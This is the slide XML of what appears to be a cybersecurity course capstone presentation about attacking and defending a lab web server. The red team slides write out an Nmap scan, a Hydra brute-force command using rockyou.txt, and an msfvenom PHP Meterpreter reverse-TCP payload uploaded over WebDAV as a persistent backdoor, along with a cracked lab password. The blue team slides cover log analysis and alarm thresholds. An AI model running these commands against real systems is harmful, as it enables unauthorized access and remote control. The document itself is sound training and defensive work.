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 Thin"/>
      <p:regular r:id="rId41"/>
      <p:bold r:id="rId42"/>
      <p:italic r:id="rId43"/>
      <p:boldItalic r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium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Inconsolata"/>
      <p:regular r:id="rId53"/>
      <p:bold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Roboto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1C564A-FB1D-4377-BAEA-345949156226}">
  <a:tblStyle styleId="{491C564A-FB1D-4377-BAEA-3459491562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Thin-bold.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId45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edium-boldItalic.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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Light-boldItalic.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight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Ligh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Inconsolata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54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-bold.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7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bold.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8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15cf594a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15cf594a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1824d738d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1824d738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15cf594a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15cf594a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15cf594a3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15cf594a3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15cf594a3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15cf594a3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15cf594a3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115cf594a3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15cf594a3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15cf594a3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15cf594a3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15cf594a3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1617071db9_0_10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1617071db9_0_10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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Nmap port scan can easily be seen by the increase in packets at one time period against of range of normal activity. A Nmap port scan will scan 1000 TCP ports within fractions of a second.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1617071db9_0_9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1617071db9_0_9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1617071db9_0_3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1617071db9_0_3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1617071db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1617071d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148ac3db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148ac3db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46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0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74.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77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71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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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92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95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Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94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2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Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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hoenixnap.com/kb/iptables-tutorial-linux-firewall#:~:text=To%20allow%20HTTP%20web%20traffic%2C%20enter%20the%20following,%E2%80%93A%20INPUT%20%E2%80%93p%20tcp%20%E2%80%93%E2%80%93dport%2022%20%E2%80%93j%20ACCEPT" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tecadmin.net/disable-directory-listing-apache/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://phoenixnap.com/kb/prevent-brute-force-attacks" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.filestack.com/thoughts-and-knowledge/secure-file-upload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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nmap Network Port Scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119" name="Google Shape;111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781275" y="1643925"/>
            <a:ext cx="23715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and Processes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Scanning Network_Range using Nmap Commands from the Command Line.</a:t>
            </a:r>
            <a:endParaRPr sz="12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Nmap -sV 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="12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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1690950"/>
            <a:ext cx="24285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We were able to access the company unauthorised folders to leave a malicious shell running Hydra via open port 80.</a:t>
            </a:r>
            <a:endParaRPr sz="12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1" name="Google Shape;113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6429675" y="143152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5" name="Google Shape;11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25" y="1481325"/>
            <a:ext cx="2943000" cy="30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137" y="0"/>
            <a:ext cx="6549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[Unauthorized File Report]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146" name="Google Shape;114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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="826375" y="1480625"/>
            <a:ext cx="21210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Cracked stolen credentials to connect via WebDAV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Generated custom web shell with msfconsole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Uploaded shell via WebDAV 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9" name="Google Shape;1149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0" name="Google Shape;1150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1" name="Google Shape;1151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3" name="Google Shape;1153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4" name="Google Shape;1154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5" name="Google Shape;1155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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707325" y="1530375"/>
            <a:ext cx="1979100" cy="24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Uploading a web shell allowed us to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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arbitrary shell commands</a:t>
            </a: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 on the target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7" name="Google Shape;1157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8" name="Google Shape;1158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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473225" y="1481375"/>
            <a:ext cx="23319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Running arbitrary shell commands allows Meterpreter to open a full-fledged connection to the target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Meterpreter is a metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enabled Directory Listing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167" name="Google Shape;116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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="791675" y="1609225"/>
            <a:ext cx="2169600" cy="29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Navigate to 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr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We were able to access directory files that led us to an extended url pathways into the company’s unauthorize secret folders.</a:t>
            </a:r>
            <a:endParaRPr sz="1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0" name="Google Shape;1170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1" name="Google Shape;1171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2" name="Google Shape;1172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6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74" name="Google Shape;1174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5" name="Google Shape;1175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6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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3538750" y="1534000"/>
            <a:ext cx="22920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Due to exposure to Directory files; managed to access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/company_folders/secret_folder/</a:t>
            </a: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 url pathway which we used after discovering Ashton’s password.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-We used Hydra password spray against the wordlists dictionary file rockyou.txt to discover Ashton’s password. (Linux4u)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8" name="Google Shape;1178;p6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79" name="Google Shape;117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0" name="Google Shape;1180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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6408325" y="1534000"/>
            <a:ext cx="2341200" cy="3182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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480675" y="1534000"/>
            <a:ext cx="2264700" cy="23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3" name="Google Shape;11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800" y="2141525"/>
            <a:ext cx="2227500" cy="16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[Remote Code Execution]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;118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7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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813375" y="1655500"/>
            <a:ext cx="21711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Used Meterpreter to connect to uploaded web shell</a:t>
            </a:r>
            <a:endParaRPr sz="12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Used shell to explore and compromise target</a:t>
            </a:r>
            <a:endParaRPr sz="12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2" name="Google Shape;1192;p6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93" name="Google Shape;1193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4" name="Google Shape;1194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67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96" name="Google Shape;1196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7" name="Google Shape;1197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67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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630925" y="1730725"/>
            <a:ext cx="2171100" cy="26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Leveraging the RCE allowed us to open a Meterpreter shell to the target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Once on the target, the full file system was available for exploration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0" name="Google Shape;1200;p67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01" name="Google Shape;1201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2" name="Google Shape;1202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3" name="Google Shape;1203;p67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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6554225" y="1591875"/>
            <a:ext cx="2111700" cy="29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msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="12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Achieving a shell on the target allowed us to display all files and capture the flag</a:t>
            </a:r>
            <a:endParaRPr sz="12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Company Directory finding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screenshots of files found with content</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1210" name="Google Shape;121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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="42675" y="3543300"/>
            <a:ext cx="8758200" cy="1190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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4710500" y="11480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6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50" y="1198675"/>
            <a:ext cx="3251575" cy="20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75" y="1586075"/>
            <a:ext cx="3326301" cy="16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27375"/>
            <a:ext cx="8839201" cy="1283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 against a known wordlists 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69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="288525" y="949000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Running a Hydra password spray against the wordlists rockyou.txt dictionary file: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hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder/</a:t>
            </a:r>
            <a:endParaRPr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rockyou.txt.gz first had to be unzipped. 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224" name="Google Shape;1224;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3129350" y="99997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we were able to discover Ashton’s password by;</a:t>
            </a:r>
            <a:endParaRPr b="1"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Running Hydra against Ashton’s login and the rockyou.txt password dictionary, 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1225" name="Google Shape;12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250" y="1041500"/>
            <a:ext cx="2428500" cy="30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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="97375" y="0"/>
            <a:ext cx="8719200" cy="521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Brute force information gathered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Ashton successful sign in, hash discovery, and cracked hash for password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231" name="Google Shape;123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2" name="Google Shape;12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75" y="1499300"/>
            <a:ext cx="3585250" cy="19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375" y="1410100"/>
            <a:ext cx="3723829" cy="21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75" y="3757850"/>
            <a:ext cx="8927351" cy="13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Persistent reverse shell backdoor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240" name="Google Shape;1240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1" name="Google Shape;1241;p71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="236156" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1242" name="Google Shape;124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43" name="Google Shape;1243;p7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71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3048125" y="888275"/>
            <a:ext cx="533372" cy="532732"/>
            <a:chOff x="457191" y="1379787"/>
            <a:chExt cx="695400" cy="694476"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1245" name="Google Shape;1245;p71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457191" y="1379787"/>
              <a:ext cx="695400" cy="6204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46" name="Google Shape;1246;p7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7" name="Google Shape;1247;p71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5806523" y="888285"/>
            <a:ext cx="533372" cy="532717"/>
            <a:chOff x="457191" y="1378809"/>
            <a:chExt cx="695400" cy="695454"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1248" name="Google Shape;1248;p71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457191" y="137880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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236150" y="1528625"/>
            <a:ext cx="2013900" cy="23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ran MSFvenom to create a backdoor that connects back to our attacking machine by using a reverse shell TCP.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MSFconsole Metasploit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Reverse TCP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51" name="Google Shape;1251;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806525" y="1620125"/>
            <a:ext cx="22152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backdoor was established within the Capstone machine using our reverse shell.php. This will enable the Capstone to connect back to our Meterpreter listener through port 4444</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1252" name="Google Shape;12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175" y="1620125"/>
            <a:ext cx="2800351" cy="23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Meterpreter listener set-up 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258" name="Google Shape;1258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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Msfconsole Metasploit established with shell added to 192.168.1.105/webdav/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0" name="Google Shape;12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25" y="1325725"/>
            <a:ext cx="7928174" cy="32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73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7" name="Google Shape;1267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73" name="Google Shape;1273;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91062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274" name="Google Shape;1274;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1696000"/>
            <a:ext cx="8183100" cy="3220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5" name="Google Shape;1275;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4222600" y="799225"/>
            <a:ext cx="3853200" cy="76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54940" lvl="0" marL="32004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000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port scan occurred at 16:39</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-154940" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17,000 packets were sent from 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-154940" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"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Network Traffic increasing abruptly shows that, this was a port scan</a:t>
            </a:r>
            <a:endParaRPr sz="5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76" name="Google Shape;12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13" y="1881000"/>
            <a:ext cx="7469373" cy="2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Analysis: Identifying the Port Scan_Cont.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Google Shape;1283;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288300" y="5271575"/>
            <a:ext cx="8655300" cy="20007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port scan occur?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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="14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17.00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groups of many packets were sent and from which IP?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1400"/>
              <a:buChar char="★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="14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Resting the courser at the top of the arc, we can observe </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="14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13,527. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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 In the second chart we can observe it’s the IP address </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="14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192.168.1.90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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4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Font typeface="Roboto"/>
              <a:buChar char="★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="14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We see that the victim responded back with 401 (Unauthorized), 207 (Multi-Status), 200 (OK), and 404 (Not found) responses. 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1284" name="Google Shape;12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00" y="835125"/>
            <a:ext cx="8030574" cy="39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1" name="Google Shape;1291;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305675" y="675975"/>
            <a:ext cx="3378900" cy="1025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92" name="Google Shape;1292;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1855650"/>
            <a:ext cx="8339100" cy="22380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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4801175" y="675975"/>
            <a:ext cx="3587100" cy="103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13,534 requests were made 12 Feb, 2022 @ 16:00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connect_to_secret_folder and secret_folder. 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Instructions on how to connect to WebDav found within connect_to_secret_folder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One request was made to connect_to_corp_server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94" name="Google Shape;12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00" y="1748050"/>
            <a:ext cx="8297800" cy="23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76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="22011" l="1161" r="2032" t="5843"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="965225" y="4197725"/>
            <a:ext cx="7220575" cy="4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2" name="Google Shape;1302;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="5186125"/>
            <a:ext cx="9168600" cy="11481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logs contain evidence of a large number of requests for the sensitive data. Only 5 requests were successful.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a telltale signature of a brute-force attack.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Specifically, the password protected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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secret_folder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was requested 6961 times, but the file inside that directory was only requested 5 times.  Out of 6209 requests, only 5 were successful.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1303" name="Google Shape;130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00" y="1638150"/>
            <a:ext cx="8165540" cy="30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77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297800" y="735575"/>
            <a:ext cx="426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13,534 requests were made during the Hydra attack.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had been made before the attacker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discovered the password?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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="627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1" name="Google Shape;1311;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131400" y="5204600"/>
            <a:ext cx="9012600" cy="9909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logs contain evidence of a large number of requests for the sensitive data. Only 5 requests were successful.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a telltale signature of a brute-force attack.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Specifically, the password protected </a:t>
            </a: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secret_folder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was requested 6961 times, but the file inside that directory was only requested 5 times.  Out of 6209 requests, only 5 were successful.</a:t>
            </a:r>
            <a:endParaRPr sz="400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1312" name="Google Shape;1312;p7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78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5680800" cy="726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40 total requests were made to the WebDav directory.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Files requested include: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/webdav	/webdav/reverseshell.php	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /webdav/Dasswd.dav  </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1314" name="Google Shape;13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50" y="1827372"/>
            <a:ext cx="7823825" cy="285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7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2" name="Google Shape;1322;p7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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="663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328" name="Google Shape;1328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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282525" y="1540150"/>
            <a:ext cx="3795300" cy="2591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alarm can be set to detect future port scans?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0 of requests per second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threshold would you set to activate this alarm?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Alarms should go off if a given IP address sends more than </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests per second for more than 5 seconds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0" name="Google Shape;1330;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4980525" y="1540150"/>
            <a:ext cx="3610200" cy="27189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configurations can be set on the host to mitigate port scans?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Bandwidth using Local firewall to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regulate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incoming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t> connections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Denial of Service Prevention by enabling ICMP filtering.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E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nabling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t> only known IP list.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solution. If possible, provide required command lines.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100"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>A firewall will block anonymous requests so will not reply to a random scan from the internet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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="591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336" name="Google Shape;1336;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4916700"/>
            <a:ext cx="90717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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311450" y="1800000"/>
            <a:ext cx="3789600" cy="2655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alarm can be set to detect future unauthorized access?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Allow only authorized IP addresses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Trigger  alarm if an IP not on the allow list attempts to connect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threshold would you set to activate this alarm?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This is a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alarm: If the incoming IP is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t> allowed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>it tigers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
